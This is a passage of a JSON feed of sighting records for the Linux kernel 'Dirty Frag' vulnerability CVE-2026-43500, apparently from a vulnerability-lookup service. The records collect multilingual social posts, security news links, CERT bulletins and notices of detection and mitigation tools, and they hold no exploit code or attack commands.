Ubuntu/Debian mitigation only.", "creation_timestamp": "2026-05-08T22:20:51.396533Z"}, {"uuid": "d80dfe3e-9237-4455-993b-57e29c665d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ruari.velocipederider.com.ap.brid.gy/post/3mlkroxxmpot2", "content": "I upgraded my kernel for Copy Fail (CVE-2026-31431) not that long ago.\n\nNow I am upgrading again for Dirty Frag (CVE-2026-43284 and CVE-2026-43500).\n\nI hope things calm down a bit now but I guess we shall see\u2026", "creation_timestamp": "2026-05-11T07:47:08.360320Z"}, {"uuid": "c02ca508-6aa8-4deb-8f10-97d8475fe18a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlktlos7p3y2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Linux [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T08:18:58.723113Z"}, {"uuid": "f7d67cc4-4b95-44ab-aa32-40a53ca85c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83847", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DirtyFrag-Detector\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a liamromanis101\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 
Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 19:54:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43284/CVE-2026-43500 'DirtyFrag' Benign patch & mitigation detection script\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T20:00:04.000000Z"}, {"uuid": "cd8dabe1-ef45-4567-ab0e-33c8f543d551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvz67xn5b2", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:37.430518Z"}, {"uuid": "d4fed6c5-e999-46d8-9c3f-081874acd533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mlkvza6vwp32", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks Also called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was release...\n\n#Endpoint #Security #Vulnerabilities #Dirty #Frag #Featured [\u2026] \n\n[Original post on securityweek.com]", "creation_timestamp": "2026-05-11T09:01:48.018540Z"}, {"uuid": "683ff717-aa37-4f44-956c-3069f98b8f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "Telegram/Yr-1pp_OQlsAxCk9olefEOIlRJklCfDEolOYJn0mNy08hY4", "content": "", "creation_timestamp": "2026-05-09T09:00:04.000000Z"}, {"uuid": "5af80ec5-a705-4bb4-a154-72915a23f234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116556150150224566", "content": "Dirty Frag Schwachstelle in Linux erm\u00f6glicht lokale Rechteausweitung\nhttps://borncity.com/blog/2026/05/09/dirty-frag-lokale-rechteausweitung-im-linux-kernel-cve-2026-43284-cve-2026-43500/", "creation_timestamp": "2026-05-11T13:21:50.861010Z"}, {"uuid": "ea8d3aa8-ea19-4ad2-b2f0-a591c2f7395b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mllgamqquta2", "content": "Two stable kernels with Dirty Frag fixes Greg Kroah-Hartman has released the 7.0.6 and 6.18.29 stable kernels with Hyunwoo Kim's patch for the second vulnerability ( CVE-2026-43500 ) reported w...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T13:52:26.914516Z"}, {"uuid": "9f4f967b-4ecd-44a1-bca1-b0f6f33f76d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mllpeyrv4s2j", "content": "Load-Bearing Assumptions: the rxrpc case (CVE-2026-43500) and the constraint that was never there\nDiscussion | lobsters | Author: fro", "creation_timestamp": "2026-05-11T16:35:39.861682Z"}, {"uuid": "ebd25b75-cc8b-4cff-ac23-080a2f8d908c", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3mllq6vsbtk2g", "content": "Load-Bearing Assumptions: the rxrpc case (CVE-2026-43500) and the constraint that was never there https://lobste.rs/s/tuiapt #security #linux ", "creation_timestamp": "2026-05-11T16:50:04.610734Z"}, {"uuid": "cba14dc1-4b14-466b-a5d3-2d87d564bbe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cybergeodigest.bsky.social/post/3mll3k22l4g2s", "content": "Today's CyberGeoDigest \u2014 9 stories\n\nTop: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch\n\n#InfoSec #CVE #CyberSecurity", "creation_timestamp": "2026-05-11T10:41:20.558084Z"}, {"uuid": "b5ed169c-587d-4af9-89fb-48c9525082a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mll3pftazom2", "content": "Today's CyberGeoDigest \u2014 9 stories Top: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch #InfoSec #CVE #CyberSecurity\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T10:43:38.735053Z"}, {"uuid": "f7d9bb71-4d34-4878-9730-f0296b123b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mll3uiaiym2t", "content": "CVE-2026-43500 - rxrpc: Also unshare DATA/RESPONSE packets when paged frags are present\nCVE ID : CVE-2026-43500\n \n Published : 
May 11, 2026, 8:16 a.m. | 2\u00a0hours, 14\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Also un...", "creation_timestamp": "2026-05-11T10:46:19.822871Z"}, {"uuid": "c93642a5-1596-451e-b015-fd625e2919ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83783", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a vcheck\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a krisiasty\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 09:35:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability detection and mitigation tool for Copy Fail and Dirty Frag bugs (CVE-2026-31431, CVE-2026-43284, CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T10:00:04.000000Z"}, {"uuid": "eed9c7aa-138b-486a-99b6-17c5e5d54832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/information_security_channel/55241", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks\nhttps://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/\n\nAlso called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was released.\nThe post New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks (https://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/) 
appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2026-05-11T09:33:57.000000Z"}, {"uuid": "8c3f3c5a-1ed3-4ae1-be5c-4f2f24b711e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/bdufstecru/3153", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044f RxRPC \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u0430\u043c\u0438 \u0431\u0443\u0444\u0435\u0440\u0430. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438\n\nBDU:2026-06470\nCVE-2026-43500\n\n\u0412 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c\u0441\u044f \"\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 
\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c LINUX\", \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0424\u0421\u0422\u042d\u041a \u0420\u043e\u0441\u0441\u0438\u0438, \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u043e\u043c 25 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Linux:\nhttps://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/\n\n\u0414\u043b\u044f \u041e\u0421 Astra Linux:\nhttps://wiki.astralinux.ru/x/kwCmH\nhttps://wiki.astralinux.ru/x/ogCmH\nhttps://wiki.astralinux.ru/x/qACmH\nhttps://wiki.astralinux.ru/x/pACmH\nhttps://wiki.astralinux.ru/x/pgCmH\n\n\u0414\u043b\u044f Debian GNU/Linux:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Red Hat Inc.:\nhttps://access.redhat.com/security/cve/cve-2026-43500", "creation_timestamp": "2026-05-12T14:15:44.000000Z"}, {"uuid": "6b73da77-af1e-433a-ad01-0f08187feea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mllblfmxrm26", "content": "\ud83d\udfe0 CVE-2026-43500 - High (7.8)\n\nIn the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Also unshare DATA/RES...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-43500/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": 
"2026-05-11T12:28:38.155439Z"}, {"uuid": "4198946c-7b8c-4c2f-a0b3-e51f9096fb69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "Telegram/9XqhTISUbDUPo_c26c1BEinqDeNjvDc1gYqinuT1sIOuN_4", "content": "", "creation_timestamp": "2026-05-11T09:00:05.000000Z"}, {"uuid": "d4a78db3-a8ce-493a-b4e7-a837615ca965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/mora.mastodon.uno.ap.brid.gy/post/3mln3wbdkpyt2", "content": "Dirty Frag: Linux Kernel Local Privilege Escalation via ESP and RxRPC\nUnpatched kernel flaw chain (CVE-2026-43284, CVE-2026-43500) enables root escalation on major Linux distributions.\n\nhttps://www.wiz.io/blog/dirty-frag-linux-kernel-local-privilege-escalation-via-esp-and-rxrpc", "creation_timestamp": "2026-05-12T05:52:44.436956Z"}, {"uuid": "a14a8f99-587c-4685-9551-d3d0007aa549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mlnd2jbodkdu", "content": "Linux\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u300cDirty Frag\u300d \u653b\u6483\u3067\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u53ef\u80fd\u6027\uff08CVE-2026-43284\u3001CVE-2026-43500\uff09 | Codebook\uff5cSecurity News https://codebook.machinarecord.com/threatreport/silobreaker-cyber-alert/45540/", "creation_timestamp": "2026-05-12T08:00:19.267896Z"}, {"uuid": "8f83fa33-4bdb-4919-9310-3cfaff4bd703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": 
"https://www.govcert.gov.hk/en/alerts_detail.php?id=1858", "content": "", "creation_timestamp": "2026-05-10T21:00:00.000000Z"}, {"uuid": "3e07845c-0045-4d19-a7ae-29fafb6a36e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mlph64kntd2q", "content": "The latest update for #SafeBreach includes \"Dirty Frag Vulnerability (CVE-2026-43284 &amp; CVE-2026-43500): Why Reliable #Linux Privilege Escalation Changes the Defense Equation\".\n\n#Cybersecurity https://opsmtrs.com/41NWGuQ", "creation_timestamp": "2026-05-13T04:19:13.577271Z"}, {"uuid": "e8c2064b-58db-44c3-8fec-f817b85e822e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T20:00:00.000000Z"}, {"uuid": "92d2b65f-1198-45d4-aec0-72f8ab958bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlrrkr5rym2j", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 134 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 73 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 14 interactions\nCVE-2026-42945: 7 interactions\nCVE-2025-8088: 6 interactions\n", "creation_timestamp": "2026-05-14T02:30:34.309154Z"}, {"uuid": "a19e230e-49ed-4350-aaa5-2de5355c512c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": 
"https://bsky.app/profile/pmloik.bsky.social/post/3mlubzmjy2i2u", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 147 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 72 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 39 interactions\nCVE-2026-42945: 17 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-15T02:30:32.089225Z"}, {"uuid": "d0fa5e9c-b3fc-4de3-bc37-2de094af107d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/redhat-linux-kernel-multiple-vulnerabilities_20260508", "content": "", "creation_timestamp": "2026-05-07T20:00:00.000000Z"}, {"uuid": "b66f5d61-8ff7-42c4-86c5-07f9fab949a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-rilevata-poc-per-l-elevazione-di-privilegi-in-linux-cve-2026-43284", "content": "", "creation_timestamp": "2026-05-08T04:21:59.000000Z"}, {"uuid": "fbca3de7-8e36-4d1f-a6cb-cdcaad9d3c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-poc-e-sfruttamento-di-vulnerabilita-per-l-elevazione-di-privilegi-in-linux", "content": "Disponibile un Proof of Concept (PoC) per \u201cDirty Frag\u201d, catena di sfruttamento delle vulnerabilit\u00e0 identificate tramite CVE-2026-43284 e CVE-2026-43500, relativa al Kernel Linux. La vulnerabilit\u00e0 interessa i moduli esp4 ed esp6 del sottosistema IPsec, utilizzato per la cifratura del traffico di rete e delle VPN, e il modulo rxrpc, utilizzato dal protocollo di rete AFS. 
La vulnerabilit\u00e0, qualora sfruttata, potrebbe consentire a un utente non privilegiato, l\u2019ottenimento di privilegi di root.", "creation_timestamp": "2026-05-08T09:21:59.000000Z"}, {"uuid": "e7baa204-961a-4e2e-9101-b0ec1e1a30fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T18:00:00.000000Z"}, {"uuid": "c4a532f5-8436-4d00-8b4b-2027a2d5f1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlpb3on5ls2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 129 interactions\nCVE-2026-43500: 94 interactions\nCVE-2026-31431: 76 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45185: 8 interactions\nCVE-2026-41940: 5 interactions\nCVE-2026-42208: 5 interactions\n", "creation_timestamp": "2026-05-13T02:30:29.227267Z"}, {"uuid": "a5c2c470-ca17-40d9-b322-92c6b0117dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116564950057858680", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:https://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:02.278845Z"}, {"uuid": "a3801d8d-f850-4b0e-a0fb-6dd0be3e4a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mlpbmfkh4vz2", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:\nhttps://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:11.692753Z"}, {"uuid": "58ec076b-8726-44e1-a384-f19f547bfdd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/84198", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a dirty_frag_mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a vorkampfer\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-14 10:15:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA bash script for mitigating  linux dirtyfrag exploit CVE-2026-43500, and fragnesia\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-14T11:00:04.000000Z"}, {"uuid": "25a29225-de07-45ea-b813-c0f18fce5a00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/true_secator/8202", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043d\u0430\u0434 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c 
\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u043a\u0430\u043a\u00a0Fragnasia \u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2026-46300.\n\n\u041e\u043d\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux XFRM ESP-in-TCP, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0431\u0430\u0439\u0442\u044b \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u0444\u0430\u0439\u043b\u043e\u0432 